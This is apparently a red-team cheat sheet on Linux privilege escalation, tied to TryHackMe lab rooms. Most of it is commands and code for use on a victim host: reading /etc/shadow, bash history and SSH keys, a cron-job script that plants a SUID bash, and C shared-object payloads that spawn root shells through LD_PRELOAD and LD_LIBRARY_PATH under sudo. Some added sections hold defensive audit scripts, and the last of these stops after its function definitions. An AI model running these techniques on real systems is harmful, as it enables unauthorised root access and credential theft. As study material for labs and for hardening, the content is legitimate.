# Linux


**Gathering Info**

```
whoami
id
groups
cat ~/.bash_history
```

```
uname -a
```

Check for passwords in environment variables

```
env
```

## Find files

Files owned by your user

**Victim**

```
find / -user $USER 2>/dev/null
```

Files owned by a given group (set `GROUP` to the group name first)

**Victim**

```
GROUP=groupname
find / -type f -group "$GROUP" 2>/dev/null
```

**Find passwords**

```
cat /etc/passwd
cat /etc/shadow
cat /var/www/html/wp-config.php #WordPress sites: database credentials
cat /home/user/myvpn.ovpn #VPN. Look for auth-user-pass and find the file it points to.
find / -type f -name "*.bak" 2>/dev/null #quote the glob so the shell does not expand it first
#Find files and exclude paths to reduce results
find / \( -path /lib -o -path /snap -o -path /etc/sane.d -o -path /etc/fonts -o -path /usr/share -o -path /etc/apache2 \) -prune -o -name "*.conf" -print 2>/dev/null
```

**Victim**

```
cat ~/.bash_history | grep -i passw

#SSH keys
find / -name id_rsa 2>/dev/null
cat /backups/supersecretkeys/id_rsa
```

## Weak File Permissions

### Readable /etc/shadow

[#weak-file-permissions-readable-etc-shadow](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#weak-file-permissions-readable-etc-shadow "mention")

### Writable /etc/shadow

[#weak-file-permissions-writable-etc-shadow](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#weak-file-permissions-writable-etc-shadow "mention")

### Writable /etc/passwd

[#weak-file-permissions-writable-etc-passwd](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#weak-file-permissions-writable-etc-passwd "mention")

## Cron Jobs

| Finding & Comments                                                             | Example                                                                                                                                           |
| ------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------- |
| Current user has permission to overwrite the contents of the script the job runs | [linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention") |
| Job does not use an absolute path, so the command resolves through PATH to a different file | [linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention") |

**Victim**

```
cat /etc/crontab
```

Other locations where cron jobs may be defined

**Victim**

```
cat /etc/cron.d/*
```

### Cron Jobs - File Permissions

**Examples**

[#cron-jobs-file-permissions](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#cron-jobs-file-permissions "mention")

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

View the contents of the system-wide crontab.

**Victim**

```
cat /etc/crontab
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FtaNaMopHeaNEAyseNiCY%2Fimage.png?alt=media&#x26;token=98d0e242-983b-4208-9fac-282d583c9b19" alt=""><figcaption></figcaption></figure>

There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh.

Locate the full path of the overwrite.sh file.

**Victim**

```
locate overwrite.sh
```

Note that the file is world-writable.

**Victim**

```
ls -l /usr/local/bin/overwrite.sh
```

### Cron Jobs - PATH Environment Variable

**Examples**

[#cron-jobs-path-environment-variable](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#cron-jobs-path-environment-variable "mention")

View the contents of the system-wide crontab

**Victim**

```
cat /etc/crontab
```

Note that the PATH variable starts with /home/user, which is our user's home directory. Create a file called overwrite.sh in your home directory with the following contents:

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FGN3LpU7oVh2AD91TSVuY%2Fimage.png?alt=media&#x26;token=69f24d0b-b2de-4c32-aacd-7ecac5c7a54a" alt=""><figcaption></figcaption></figure>

#### overwrite.sh

```
#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
```

Make sure that the file is executable:

**Victim**

```
chmod +x /home/user/overwrite.sh
```

Wait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:

**Victim**

```
/tmp/rootbash -p
```

### Cron Jobs - Wildcards

**Examples**

[#cron-jobs-wildcards](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#cron-jobs-wildcards "mention")

View the contents of the other cron job script

**Victim**

```
cat /usr/local/bin/compress.sh
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FHV0wSN6lCXd1FXff3V97%2Fimage.png?alt=media&#x26;token=670ea72d-d11e-4bbb-843d-18b70774cd17" alt=""><figcaption></figcaption></figure>

Note that the tar command is being run with a wildcard (\*) in your home directory.
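The two cron weaknesses covered above (a job script that other users can write to, and a relative command name resolved through a PATH that begins with a user-writable directory) are easy to check for mechanically, which is how a defender would catch them before a walkthrough does. The script below is an added example, not code from the original page or from TryHackMe: `writable_by_others`, `audit_crontab` and `make_demo` are names chosen here, the crontab it audits is a constructed sample built in a temp directory, and it assumes GNU coreutils `stat -c` and the system crontab format with a user field (`@reboot`-style lines are not handled).

```shell
#!/bin/sh
# Added audit example, not code from the original page. Parses a system-style
# crontab ("min hour dom mon dow user command ...") and flags job scripts that
# group/others can write to, relative command names, and PATH directories that
# non-root users can write to. Assumes GNU coreutils `stat -c` (Linux).

# Succeed if the path's mode grants write to group or others (octal digit 2,3,6,7).
writable_by_others() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 1
    go=${mode#"${mode%??}"}            # last two octal digits: group, other
    case "$go" in
        [2367]?|?[2367]) return 0 ;;
        *) return 1 ;;
    esac
}

# Print one finding per line; exit 1 if anything was found, 0 if clean.
audit_crontab() {
    crontab="$1"
    findings=$(
        path=$(sed -n 's/^PATH=//p' "$crontab" | head -n 1)
        if [ -n "$path" ]; then
            printf '%s\n' "$path" | tr ':' '\n' | while read -r dir; do
                case "$dir" in
                    /*) if writable_by_others "$dir"; then echo "WRITABLE_PATH_DIR $dir"; fi ;;
                    *)  echo "RELATIVE_PATH_DIR '$dir'" ;;
                esac
            done
        fi
        # the command is field 7 of a job line; comments and VAR=value lines are skipped
        awk '$0 !~ /^[ \t]*#/ && NF >= 7 { print $7 }' "$crontab" | while read -r cmd; do
            case "$cmd" in
                /*) if writable_by_others "$cmd"; then echo "WRITABLE_SCRIPT $cmd"; fi ;;
                *)  echo "RELATIVE_COMMAND $cmd" ;;
            esac
        done
    )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Constructed demo environment (sample data under a temp dir, not a real host):
# a world-writable PATH entry, one world-writable job script, one locked-down
# script, and a job that names its script without an absolute path.
make_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/home/user" "$d/usr/local/bin"
    chmod 777 "$d/home/user"                   # user-writable directory placed first in PATH
    chmod 755 "$d/usr/local/bin"
    printf '#!/bin/sh\n' > "$d/usr/local/bin/overwrite.sh"
    chmod 777 "$d/usr/local/bin/overwrite.sh"  # world-writable job script
    printf '#!/bin/sh\n' > "$d/usr/local/bin/compress.sh"
    chmod 755 "$d/usr/local/bin/compress.sh"   # correctly locked down
    cat > "$d/crontab" <<EOF
# constructed sample system crontab
PATH=$d/home/user:$d/usr/local/bin
* * * * * root overwrite.sh
* * * * * root $d/usr/local/bin/overwrite.sh
* * * * * root $d/usr/local/bin/compress.sh
EOF
    echo "$d"
}

demo=$(make_demo)
audit_crontab "$demo/crontab" || echo "cron audit: findings above need attention"
```

On a real host the same function can be pointed at `/etc/crontab` and each file in `/etc/cron.d/`; the non-zero exit status makes it usable as a scheduled compliance check, and the fix for each finding is the obvious one: absolute paths in job lines, a PATH containing only root-owned directories, and mode 755 or tighter on every script cron runs.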

## Sudo/SUID/Capabilities

Run all of these commands, then check <https://gtfobins.github.io/> for each binary found; the commands may give different results.

Check which commands can be run with sudo (look in particular for NOPASSWD entries)

**Victim**

```
sudo -l
```

| Finding                     | Comments             | Examples                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            |
| --------------------------- | -------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| yum                         | Privilege Escalation | [daily-bugle](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/daily-bugle "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 |
| anansi\_util                | Privilege Escalation | [brainpan-1](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/brainpan-1 "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   |
| vi                          |                      | [#escaping-vi-editor](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/common-linux-privesc#escaping-vi-editor "mention") [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/year-of-the-rabbit#privilege-escalation "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/chocolate-factory#privilege-escalation "mention")                                                                                                                                                                                                           |
| BASH scripts                |                      | [chill-hack](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/chill-hack "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/wekor#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                       |
| chmod                       |                      | [#privilege-escalation-option-3-chmod](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/colddbox-easy#privilege-escalation-option-3-chmod "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
| apache2                     |                      | [#apache2](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#apache2 "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          |
| nmap                        |                      | [#nmap](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#nmap "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                |
| ftp                         |                      | [#ftp](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#ftp "mention")[#privilege-escalation-option-2-ftp](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/colddbox-easy#privilege-escalation-option-2-ftp "mention")                                                                                                                                                                                                                                                                                                                                                                                    |
| more                        |                      | [#more](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#more "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                |
| less                        |                      | [#less](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#less "mention")[#privlege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/brooklyn-nine-nine#privlege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                         |
| awk                         |                      | [#awk](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#awk "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
| man                         |                      | [#man](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#man "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
| vim                         |                      | [#vim](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#vim "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/napping#privilege-escalation "mention")[linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention")[#privilege-escalation-option-1-vim](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/colddbox-easy#privilege-escalation-option-1-vim "mention")                                                                                                   |
| find                        |                      | [#find](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#find "mention")[linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/boiler-ctf#privilege-escalation "mention")[linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention") |
| iftop                       |                      | [#iftop](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#iftop "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              |
| sudo                        |                      | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/agent-sudo#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   |
| cat                         |                      | [brute-it](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/brute-it "mention")[dav](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/dav "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
| pkexec                      |                      | [lian\_yu](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/lian_yu "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        |
| nano                        |                      | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/gallery#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      |
| certutil                    | Read files           | [#tcp-22-ssh](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/b3dr0ck#tcp-22-ssh "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          |
| base64, base32              | Read files           | [b3dr0ck](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/b3dr0ck "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
| env                         |                      | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/dogcat#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
| pico                        |                      | [#lateral-movement](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/madeyes-castle#lateral-movement "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
| flask                       |                      | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/haskhell#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
| python3                     |                      | [#lateral-movement-will](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/watcher#lateral-movement-will "mention")[wonderland](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/wonderland "mention")[#tcp-22-ssh](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/tokyo-ghoul#tcp-22-ssh "mention")[#tcp-7321-script](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/peak-hill#tcp-7321-script "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/battery#privilege-escalation "mention") |
| tar                         |                      | [#lateral-movement](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-marketplace#lateral-movement "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/vulnnet#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                        |
| reboot                      |                      | [#initial-access](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/looking-glass#initial-access "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            |
| bash                        |                      | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/looking-glass#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                |
| ALL                         |                      | [#lateral-movement](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/biteme#lateral-movement "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               |
| fail2ban                    |                      | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/biteme#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
| exiftool                    |                      | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/cmspit#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
| awk                         |                      | [linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 |
| apache2                     |                      | [linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 |
| zip                         |                      | [#tcp-22-ssh-1](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/tomghost#tcp-22-ssh-1 "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
| tee                         |                      | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/inferno#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      |
| ko file                     |                      | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/athena#privilege-escalation "mention")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |

### SUID / SGID Executables - Known Exploits

Find all the SUID/SGID executables.

**Victim**

```
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```

| Finding | Comments                                    | Examples                                                                                                                                                                             |
| ------- | ------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| exim    | version 4.84-3                              | [#suid-sgid-executables-known-exploits](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-known-exploits "mention") |
| base64  | Read files we shouldn't have access to read | [linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention")                                    |
| find    | Privilege Escalation                        | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/expose#privilege-escalation "mention")                                        |
| python3 |                                             | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/annie#privilege-escalation "mention")                                         |

### SUID / SGID Executables - Shared Object Injection

[#suid-sgid-executables-shared-object-injection](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-shared-object-injection "mention")

### SUID / SGID Executables - Environment Variables

[#suid-sgid-executables-environment-variables](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-environment-variables "mention")

### SUID / SGID Executables - Abusing Shell Features

[#suid-sgid-executables-abusing-shell-features-1](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-abusing-shell-features-1 "mention")

[#suid-sgid-executables-abusing-shell-features-2](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-abusing-shell-features-2 "mention")

## Sudo - Environment Variables

### LD\_LIBRARY\_PATH

**Examples**

[#sudo-environment-variables](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#sudo-environment-variables "mention")

#### library\_path.c

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid() */

/* Marked as a constructor: the loader runs it as soon as the library is mapped, before main(). */
static void hijack() __attribute__((constructor));

void hijack() {
	/* Clear the variable so the spawned shell does not load this library again. */
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("/bin/bash -p");
}
```

Sudo can be configured to inherit certain environment variables from the user's environment. Check which environment variables are inherited (look for the env\_keep options):

**Victim**

```
sudo -l
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FqdO8RcOmD74VXoCBskIC%2Fimage.png?alt=media&#x26;token=a4442d58-9909-43c6-8947-c41c6a472ef9" alt=""><figcaption></figcaption></figure>

**LD\_PRELOAD** and **LD\_LIBRARY\_PATH** are both inherited from the user's environment. LD\_PRELOAD loads a shared object before any others when a program is run. LD\_LIBRARY\_PATH provides a list of directories where shared libraries are searched for first.

Create a shared object using the code located at /home/user/tools/sudo/preload.c.

**Victim**

```
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
```

**Victim**

```
sudo LD_PRELOAD=/tmp/preload.so /usr/bin/ftp
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F4f6jpJ2y83UJDUByE2fq%2Fimage.png?alt=media&#x26;token=fb28db47-473f-4e02-9a80-a805d111429a" alt=""><figcaption></figcaption></figure>

A root shell should spawn. Exit out of the shell before continuing. Depending on the program you chose, you may need to exit out of this as well.

Run ldd against the apache2 program file to see which shared libraries are used by the program.

**Victim**

```
ldd /usr/sbin/apache2
```

Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library\_path.c.

**Victim**

```
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FnbWUuBD2LaQta0wAyHxC%2Fimage.png?alt=media&#x26;token=4d038912-1240-4f8a-9273-89ae18bdf224" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo LD_LIBRARY_PATH=/tmp apache2
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F2EEGHELaeaY268UsIk8e%2Fimage.png?alt=media&#x26;token=97f65b08-f7a6-4a02-8390-aa82406250f1" alt=""><figcaption></figcaption></figure>
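The whole LD\_LIBRARY\_PATH / LD\_PRELOAD procedure above hinges on one sudoers setting: env\_keep preserving a loader variable. The POSIX-shell audit below is an added example, not code from the page or the TryHackMe room. It reads a file in sudoers syntax (or saved `sudo -l` output, which also contains the literal text `env_keep`) and reports the loader variables that are kept; the two sudoers files it inspects are constructed inline, the hardened one showing what the fix looks like.

```shell
#!/bin/sh
# Added example, not part of the original page: audit sudoers text for
# env_keep entries that let a caller carry loader variables into a
# privileged command. Input: a file in /etc/sudoers syntax, or saved
# `sudo -l` output (both contain the literal text "env_keep").

# Loader and interpreter variables that choose which code runs. Preserving
# any of them across sudo hands the caller code execution as root.
DANGEROUS_VARS="LD_PRELOAD LD_LIBRARY_PATH LD_AUDIT PERL5LIB PYTHONPATH"

# Print, one per line, every dangerous variable named on an uncommented
# env_keep line of $1. Prints nothing when the file is clean.
dangerous_env_keep() {
    for var in $DANGEROUS_VARS; do
        # -w matches whole words only, so LD_PRELOAD does not match LD_PRELOADX.
        if grep -v '^[[:space:]]*#' "$1" | grep 'env_keep' | grep -qw "$var"; then
            printf '%s\n' "$var"
        fi
    done
}

# Exit 0 when nothing dangerous is kept, 1 otherwise.
sudoers_env_is_safe() {
    [ -z "$(dangerous_env_keep "$1")" ]
}

# Constructed sample: the weak configuration the page describes, where
# env_keep preserves both loader variables for every sudo command.
WEAK_SUDOERS=$(mktemp)
cat > "$WEAK_SUDOERS" <<'EOF'
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults        env_keep += "EDITOR"
Defaults        env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
user    ALL=(root) NOPASSWD: /usr/bin/ftp, /usr/sbin/apache2
EOF

# Constructed hardened counterpart: env_reset stays, only harmless
# variables are kept, and the commented-out line is correctly ignored.
HARDENED_SUDOERS=$(mktemp)
cat > "$HARDENED_SUDOERS" <<'EOF'
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults        env_keep += "EDITOR LANG"
# Defaults      env_keep += "LD_PRELOAD"
user    ALL=(root) NOPASSWD: /usr/bin/ftp, /usr/sbin/apache2
EOF

# Stand-alone run: report the weak file, stay quiet on the hardened one.
for f in "$WEAK_SUDOERS" "$HARDENED_SUDOERS"; do
    if sudoers_env_is_safe "$f"; then
        echo "$f: no dangerous env_keep entries"
    else
        echo "$f: dangerous env_keep entries:"
        dangerous_env_keep "$f" | sed 's/^/  /'
    fi
done
```

On a real host, feed it `/etc/sudoers` and each file under `/etc/sudoers.d/` (or `sudo -l > out.txt` as the low-privileged user, then audit `out.txt`). The fix the hardened sample shows is simply not listing loader variables in env\_keep; `env_reset` alone does not protect against variables that env\_keep explicitly re-admits.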

### **LD\_PRELOAD**

**Examples**

[road](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/road "mention")

If LD\_PRELOAD is inherited by sudo, try the steps below, then run the script we are allowed to execute with NOPASSWD.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FAvj1d2LzrDmnWi9kNOdl%2Fimage.png?alt=media&#x26;token=e95e9d8a-d173-45a2-a59b-238a8e0ce3e8" alt=""><figcaption></figcaption></figure>

**Victim**

```
vi preload.c
```

**preload.c - code**

```
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* _init is the entry point the loader calls when this object is loaded (compiled with -nostartfiles). */
void _init() {
	/* Clear the variable so the spawned shell is not preloaded again. */
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/bash");
}
```

**Victim**

```
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so $NOPASSWD_SCRIPT_WE_CAN_ABUSE
```

## **Files with SUID-bit set**

**Victim**

```
find / -perm -u=s -type f 2> /dev/null 
```

| Finding                       | Comments                                                                                                            | Examples                                                                                                                                                                                                                                                                               |
| ----------------------------- | ------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| setcap                        | If setcap has the SUID bit, that is very interesting; check out the room. It could lead to privilege escalation by using it to set capabilities on other binaries. | [annie](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/annie "mention")                                                                                                                                                                                |
| Programs in strange locations | If a program is running from a user's home directory or somewhere else unusual, it may be worth investigating | [common-linux-privesc](../../../walkthroughs/tryhackme/common-linux-privesc), [madeyes-castle](../../../walkthroughs/tryhackme/madeyes-castle), [containme](../../../walkthroughs/tryhackme/containme) |
| find                          | Can spawn shell                                                                                                     | [boiler-ctf](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/boiler-ctf "mention")                                                                                                                                                                      |
| doas                          | Can read files or copy files                                                                                        | [glitch](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/glitch "mention")                                                                                                                                                                              |
| strings                       | Can read files                                                                                                      | [jack-of-all-trades](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/jack-of-all-trades "mention")                                                                                                                                                      |
| cputils                       | Can copy files                                                                                                      | [olympus](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/olympus "mention")                                                                                                                                                                            |
| tar                           | Can spawn shell                                                                                                     | [skynet](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/skynet "mention")                                                                                                                                                                              |
| grep                          | Read files                                                                                                          | [#unit-4-suid](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-local-enumeration#unit-4-suid "mention")                                                                                                                                           |
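Once the SUID inventory above has been taken, the useful defensive follow-up is to keep it as a baseline and diff against it, because several techniques on this page (NFS with no\_root\_squash, writable cron scripts) end with a new set-uid file on disk. The script below is an added example, not code from the page or the room: it builds the inventory with the same `find -perm` test, compares it against a saved baseline with `comm`, and runs against a constructed temporary directory tree with stub files standing in for real binaries.

```shell
#!/bin/sh
# Added example, not part of the original page: keep a baseline of set-uid
# and set-gid files and report anything that appears later.
# On a real host: suid_inventory / > baseline.txt, then periodically
# new_suid_files baseline.txt /

# Print "octal-mode path" for every regular file below $1 that carries the
# set-uid (4000) or set-gid (2000) bit, sorted so the lists can be compared.
suid_inventory() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -exec stat -c '%a %n' {} + 2>/dev/null | sort
}

# Print inventory lines present in the current listing but absent from the
# baseline file. comm(1) needs both inputs sorted, which suid_inventory does.
new_suid_files() {
    baseline=$1
    root=$2
    suid_inventory "$root" | comm -13 "$baseline" -
}

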